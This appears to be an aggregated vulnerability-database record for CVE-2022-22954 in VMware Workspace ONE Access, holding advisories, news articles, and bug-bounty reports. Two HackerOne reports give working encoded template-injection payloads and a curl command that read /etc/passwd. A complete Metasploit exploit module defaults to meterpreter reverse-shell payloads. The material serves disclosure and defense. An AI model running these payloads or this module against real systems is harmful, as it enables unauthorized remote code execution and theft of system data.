Public-Facing Application T1059: Command and Scripting Interpreter T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1555: Credentials from Password Stores T1071: Application Layer Protocol T1592.001: Hardware T1583.002: DNS Server T1566: Phishing T1059.007: JavaScript T1068: Exploitation for Privilege Escalation T1027: Obfuscated Files or Information T1555.004: Windows Credential Manager T1071.004: DNS T1592.002: Software T1583.001: Domains T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1071.001: Web Protocols T1590: Gather Victim Network Information T1587: Develop Capabilities T1566.002: Spearphishing Link T1204: User Execution T1132: Data Encoding T1590.005: IP Addresses T1587.001: Malware T1204.002: Malicious File T1132.001: Standard Encoding T1585: Establish Accounts T1204.001: Malicious Link T1568: Dynamic Resolution T1585.002: Email Accounts T1568.002: Domain Generation Algorithms T1588: Obtain Capabilities T1573: Encrypted Channel T1588.006: Vulnerabilities T1573.001: Symmetric Cryptography T1572: Protocol Tunneling Threat Advisories: Two actively exploited vulnerabilities affect multiple VMware products Google Chrome issues an emergency update to address the third zero-day of year 2022 Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities Old Zimbra vulnerability used to target Ukrainian Government Organizations Two Vulnerabilities discovered in AWS Client VPN OldGremlin, a threat actor targeting Russian organizations with phishing emails since 2020", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-04-21T04:59:07", "type": "hivepro", "title": "Weekly Threat Digest: 11 \u2013 17 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6882", "CVE-2022-1364", "CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961", "CVE-2022-24521", "CVE-2022-25165", "CVE-2022-25166", "CVE-2022-26904"], "modified": "2022-04-21T04:59:07", "id": "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D", "href": "https://www.hivepro.com/weekly-threat-digest-11-17-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-03-16T16:32:17", "bounty": 0.0, "description": "I found that one of the targets belonging to **DOD** is vulnerable to **CVE-2022-22954**, where an attacker may be able to execute any malicious code; escalating to remote code execution is also possible. \n\n**Technical Summary:**\n\nCVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. 
Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.\n\n**Vulnerable URL:**\n\nhttps://\u2588\u2588\u2588\u2588/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n\n## Impact\n\nThe impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nVMware workspace One\n\n## CVE Numbers\nCVE-2022-22954\n\n## Steps to Reproduce\n* Visit the vulnerable URL **https://\u2588\u2588\u2588\u2588** and Intercept the request in burp suite\n* Append the following endpoint **/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d** and analyze the response you will see the contents of **/etc/passwd**\n\n**Request:**\n\n```\nGET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nCookie: LOGIN_XSRF=NSlYKinVNwgOtuT; JSESSIONID=A86B60C5FD0B58346764D1FB01DAF155\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: 
gzip, deflate\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nCache-Control: max-age=0\nTe: trailers\nConnection: close\n```\n\n**Response:**\n\n```\nHTTP/1.1 400 \nVary: Origin\nVary: Access-Control-Request-Method\nVary: Access-Control-Request-Headers\nSet-Cookie: EUC_XSRF_TOKEN=6386e149-ff55-4a34-b474-30e6c0c62299; Path=/catalog-portal; Secure\nCache-Control: no-cache,private\nX-Content-Type-Options: nosniff\nX-XSS-Protection: 1; mode=block\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains\nX-Frame-Options: SAMEORIGIN\nContent-Type: text/html;charset=UTF-8\nContent-Language: en-US\nDate: Mon, 11 Apr 2022 15:03:40 GMT\nConnection: close\nContent-Length: 3576\n\n<!DOCTYPE HTML>\n<html xmlns=\"http://www.w3.org/1999/html\">\n<head>\n <title>Error Page</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\"/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"/>\n <style>\n body {\n background: #465361;\n }\n\n .error-container {\n position: fixed;\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n -ms-transform: translate(-50%, -50%);\n text-align: center;\n width: 25%;\n background-color: #fff;\n padding: 20px;\n box-shadow: 0 3px 2px -2px rgba(0, 0, .5, 0.35);\n border-radius: 4px;\n }\n\n .error-img-container svg {\n width: 40px;\n }\n\n .error-text-heading {\n font-weight: bold;\n padding-top: 5px;\n padding-bottom: 10px;\n }\n\n .error-text-container a {\n text-decoration: none;\n }\n </style>\n</head>\n\n<body>\n<div class=\"error-container\">\n <div class=\"error-img-container\">\n <svg id=\"icon-warning-big\" xmlns=\"http://www.w3.org/2000/svg\" width=\"32\" height=\"32\" viewBox=\"0 0 32 32\">\n <path 
d=\"M28.48,24.65,17.64,5.88a1.46,1.46,0,0,0-1.28-.74h0a1.46,1.46,0,0,0-1.28.74L4.25,24.64a1.48,1.48,0,0,0,1.28,2.22H27.2a1.48,1.48,0,0,0,1.28-2.21Zm-1.07.86a.24.24,0,0,1-.21.12H5.53a.24.24,0,0,1-.21-.37L16.15,6.49a.24.24,0,0,1,.21-.12h0a.24.24,0,0,1,.21.12L27.41,25.26A.23.23,0,0,1,27.41,25.51Z\"\n fill=\"#991700\" stroke-width=\"0\"/>\n <circle cx=\"16.36\" cy=\"13.53\" r=\"0.92\" fill=\"#f38b00\" stroke-width=\"0\"/>\n <path d=\"M16.36,16.43a.62.62,0,0,0-.62.62v5.55a.62.62,0,0,0,1.23,0V17A.62.62,0,0,0,16.36,16.43Z\"\n fill=\"#991700\" stroke-width=\"0\"/>\n </svg>\n </div>\n <div class=\"error-text-heading\">Request Failed</div>\n <div class=\"error-text-container\">\n <p>Please contact your IT Administrator.</p>\n <a href=\"/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D\">Sign Out</a>\n </div>\n</div>\n</body>\n<script>\n if (console && console.log) {\n console.log(\"auth.context.invalid\");\n console.log(\"Authorization context is not valid. Login request received with tenant code: \u2588\u2588\u2588\u2588\u2588\u2588\u2588, device id: root:x:0:0:root:/root:/bin/bash\\nbin:x:1:1:bin:/dev/null\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n }\n</script>\n</html>\n```\n\n* As you can see in the above response, it contains the contents of **/etc/passwd**\n\n## Suggested Mitigation/Remediation Actions\nUpdate the Instance to the latest version\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:17:31", "type": "hackerone", "title": "U.S. 
Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 vulnerable to CVE-2022-22954", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-29T13:58:40", "id": "H1:1537543", "href": "https://hackerone.com/reports/1537543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-16T16:32:20", "bounty": 0.0, "description": "I found that one of the targets belonging to DOD is vulnerable to CVE-2022-22954, where an attacker may be able to execute any malicious code; escalating to remote code execution is also possible. \n\n**Technical Summary:**\n\nCVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. 
Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.\n\n**Vulnerable URL:**\n\n\u2588\u2588\u2588=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\n\n## Impact\n\nThe impact of server-side template injection vulnerabilities is generally critical, resulting in remote code execution by taking full control of the back-end server. Even without the code execution, the attacker may be able to read sensitive data on the server\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588, \u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nVMware workspace one\n\n## CVE Numbers\nCVE-2022-22954\n\n## Steps to Reproduce\n* Run the following curl command \n\n**Command Used:**\n\ncurl -sk -X GET -H \"Host: \u2588\u2588\u2588\u2588\u2588\u2588\" \"\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d\"\n\n**Response:**\n\n```\n<!DOCTYPE HTML>\n<html xmlns=\"http://www.w3.org/1999/html\">\n <head>\n <title>Error Page</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\" />\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/catalog-portal/css/errorpage.css\">\n </head>\n\n <body>\n <div class=\"error-container\">\n <div class=\"error-img-container\">\n <img src=\"/catalog-portal/app/graphics/warning.svg\" class=\"warning-icon\">\n </div>\n <div class=\"error-text-heading\">Request Failed</div>\n <div class=\"error-text-container\">\n <p>Please contact your IT Administrator.</p>\n <a 
href=\"/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D\">Sign Out</a>\n </div>\n </div>\n </body>\n <script>\n if(console && console.log) {\n console.log(\"auth.context.invalid\");\n console.log(\"Authorization context is not valid. Login request received with tenant code: uhhz-lbr-004v, device id: \u2588\u2588\u2588\u2588\u2588;\n }\n </script>\n</html>\n```\n\n* As you can see in the above response, it contains the contents of /etc/passwd\n\n## Suggested Mitigation/Remediation Actions\nUpgrade the instances to the latest version\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T16:41:20", "type": "hackerone", "title": "U.S. 
Dept Of Defense: \u2588\u2588\u2588 vulnerable to CVE-2022-22954", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-20T20:16:38", "id": "H1:1537694", "href": "https://hackerone.com/reports/1537694", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T10:07:42", "description": "A remote code execution vulnerability exists in VMware Workspace. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T00:00:00", "type": "checkpoint_advisories", "title": "VMware Workspace Remote Code Execution (CVE-2022-22954)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-08-25T00:00:00", "id": "CPAI-2022-0206", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-06-29T02:12:56", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of VMware Workspace ONE Access. Authentication is not required to exploit this vulnerability. The specific flaw exists within the customError.ftl template.\n\nThe issue results from the usage of unsafe freemarker syntax, specifically a call to eval on untrusted input. An attacker can leverage this vulnerability to execute code in the context of the horizon user.\n\n**Affected Vendors:**\n\nVMWare\n\n**Affected Products:**\n\nWorkspace ONE Access, Identity Manager, vRealize Automation\n\n**Vendor Response:**\n\nVMWare has issued an update to correct this vulnerability. 
More details can be found at: <https://www.vmware.com/security/advisories/VMSA-2022-0011.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-25T00:00:00", "type": "srcincite", "title": "SRC-2022-0005 : VMware Workspace ONE Access customError.ftl Server-side Template Injection Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-06T00:00:00", "id": "SRC-2022-0005", "href": "https://srcincite.io/advisories/src-2022-0005/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware Workspace ONE Access CVE-2022-22954',\n 'Description' => %q{\n This module exploits CVE-2022-22954, an unauthenticated server-side\n template injection (SSTI) in 
VMware Workspace ONE Access, to execute\n shell commands as the \"horizon\" user.\n },\n 'Author' => [\n 'mr_me', # Discovery\n 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC\n 'wvu' # Exploit and independent analysis\n ],\n 'References' => [\n ['CVE', '2022-22954'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],\n ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],\n ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],\n ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']\n # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433\n ],\n 'DisclosureDate' => '2022-04-06',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n\n deregister_options('VHOST')\n end\n\n def check\n ret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\")\n\n return CheckCode::Unknown unless ret\n return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)\n\n CheckCode::Vulnerable\n end\n\n def exploit\n print_status(\"Executing 
#{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # Pass cmd to bash without word splitting\n bash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\"\n\n vprint_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, ssti_uri),\n 'vhost' => rand_text_alphanumeric(8..16),\n 'vars_get' => {\n %w[code error].sample => rand_text_alphanumeric(8..16),\n # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html\n ssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")})\n }\n }, datastore['CmdExecTimeout'])\n\n return unless res\n return '' unless res.code == 400 && res.body.include?('auth.context.invalid')\n\n res.body\n end\n\n def ssti_uri\n %w[\n /catalog-portal/hub-ui\n /catalog-portal/hub-ui/byob\n /catalog-portal/ui\n /catalog-portal/ui/oauth/verify\n ].sample\n end\n\n def ssti_param\n %w[deviceType deviceUdid].sample\n end\n\nend", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb"}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "VMware Workspace ONE Access and Identity Manager allow for remote code execution due to server-side template injection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2022-04-14T00:00:00", "type": "cisa_kev", "title": "VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-14T00:00:00", "id": "CISA-KEV-CVE-2022-22954", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-06-28T12:01:18", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) and Coast Guard Cyber Command (CGCYBER) released a [joint advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa22-174a>) warning the Log4Shell flaw is being abused by threat actors that are compromising public-facing VMware Horizon and Unified Access Gateway (UAG) servers.\n\nThe VMware Horizon is a platform used by administrators to run and deliver virtual desktops and apps in the hybrid cloud, while UAG provides secure access to the resources residing inside a network.\n\nAccording to the CISA, in one instance the advance persistent threat (APT) actor compromises the victim\u2019s internal network, procures a disaster recovery network, and extracts sensitive information. 
\u201cAs part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2),\u201d CISA added.\n\n## **Attack Analysis **\n\nThe CGCYBER conducts a proactive threat hunting engagement at an organization that was compromised by the threat actors who exploited Log4Shell in VMware Horizon. This revealed that after gaining initial access to the victim system, the adversary uploaded a malware identified as \u201chmsvc.exe\u201d.\n\nThe researchers analyzed the sample of the hmsvc.exe malware and confirmed that the process masquerading as a legitimate Windows service and an altered version of SysInternals LogonSessions software.\n\nAccording to the researcher sample of hmsvc.exe malware was running with the highest privilege level on a Windows system and contains an embedded executable that allows threat actors to log keystrokes, upload and execute payloads.\n\n\u201cThe malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,\u201d The initial execution of malware created a scheduled task that is set to execute every hour.\n\nAccording to CISA in another onsite incident response engagement, they observed bi-directional traffic between the victim and the suspected APT IP address.\n\nThe attackers initially gain access to the victim\u2019s production environment (a set of computers where the user-ready software or update are deployed), by exploiting Log4Shell in unpatched VMware Horizon servers. 
Later CISA observed that the adversary uses Powershell scripts to perform lateral movements, retrieve and execute the loader malware with the capability to remotely monitor a system, gain reverse shell and exfiltrate sensitive information.\n\nFurther analysis revealed that attackers with access to the organization test and production environment leveraged [CVE-2022-22954](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>), an RCE flaw in VMware workspace ONE access and Identity manager. to implant the Dingo J-spy web shell,\n\n## **Incident Response and Mitigations**\n\nCISA and CGCYBER recommended multiple actions that should be taken if an administrator discovers compromised systems:\n\n 1. Isolate compromised system\n 2. Analyze the relevant log, data and artifacts.\n 3. All software should be updated and patched from the .\n 4. Reduce the non-essential public-facing hosting service to restrict the attack surface and implement DMZ, strict network access control, and WAF to protect against attack.\n 5. 
Organizations are advised to implement best practices for identity and access management (IAM) by introducing multifactor authentication (MFA), enforcing strong passwords, and limiting user access.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-28T11:57:06", "type": "threatpost", "title": "Log4Shell Vulnerability Targeted in VMware Servers to Exfiltrate Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-06-28T11:57:06", "id": "THREATPOST:686B59F4D2481BE96E76E2A3166AAE9B", "href": "https://threatpost.com/log4shell-targeted-vmware-data/180072/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T18:59:39", "description": "VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.\n\nThe bug\u2014tracked as [CVE-2022-31656](<https://tenable.com/cve/CVE-2022-31656>)\u2014earned a rating of 9.8 on the CVSS and is one of a number of fixes the 
company made in various products [in an update](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) released on Tuesday for flaws that could easily become an exploit chain, researchers said.\n\nCVE-2022-31656 is also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it\u2013[Petrus Viet](<https://twitter.com/VietPetrus>) of VNG Security\u2013has promised [in a tweet](<https://twitter.com/VietPetrus/status/1554485970514608128>) that a proof-of-concept exploit for the bug is \u201csoon to follow,\u201d experts said.\n\nThis adds urgency to the need for organizations affected by the flaw to patch now, researchers said.\n\n\u201cGiven the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,\u201d [Claire Tills](<https://www.tenable.com/profile/claire-tills>), senior research engineer with Tenable\u2019s Security Response Team, said in an email to Threatpost. \u201cAs an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.\u201d\n\n## 